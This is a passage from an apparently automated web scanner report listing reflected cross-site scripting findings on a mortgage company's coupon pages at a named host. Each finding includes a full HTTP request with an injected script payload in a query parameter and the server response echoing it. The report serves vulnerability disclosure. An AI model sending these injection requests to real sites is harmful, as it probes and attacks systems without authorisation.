<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
1.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /coupon/d544/544003/index4.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8aff'><script>alert(1)</script>47f8bcfe9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?d8aff'><script>alert(1)</script>47f8bcfe9d3=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6199
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
1.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /coupon/d544/544003/index4.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96167"><script>alert(1)</script>32c7c592d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:27 GMT;path=/;httponly
Content-Length: 6199
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76da2"><script>alert(1)</script>5dae8506858 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:53 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6389e'><script>alert(1)</script>e62412c1fab was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:03 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:54 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14188'><script>alert(1)</script>e40d41c94b6 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:42 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30c4"><script>alert(1)</script>c7a08c9e329 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:49 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:41 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365b2"><script>alert(1)</script>3bd7c0702c5 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:59 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... ntactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5');" id="send_btn"> ...[SNIP]...
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31691'><script>alert(1)</script>19c3a704535 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:08 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:45:00 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36d"><script>alert(1)</script>507bab1fa3b was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64696'><script>alert(1)</script>dca245ab55 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:25 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6459
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a414'><script>alert(1)</script>e5878460b3e was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:36 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9e7"><script>alert(1)</script>71945edcd2 was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:35 GMT;path=/;httponly
Content-Length: 6459
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee1d"><script>alert(1)</script>f134721e21d was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=6968294ee1d"><script>alert(1)</script>f134721e21d&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:33 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:25 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb3a"><script>alert(1)</script>297f12ffdf6 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:31 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:22 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
1.156. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /coupon/d544/544003/index5.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de62"><script>alert(1)</script>2b2bf4c448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:14:22 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:43:14 GMT;path=/;httponly
Content-Length: 2873
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27040"><script>alert(1)</script>aafc10e2bc0 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:54 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:45 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
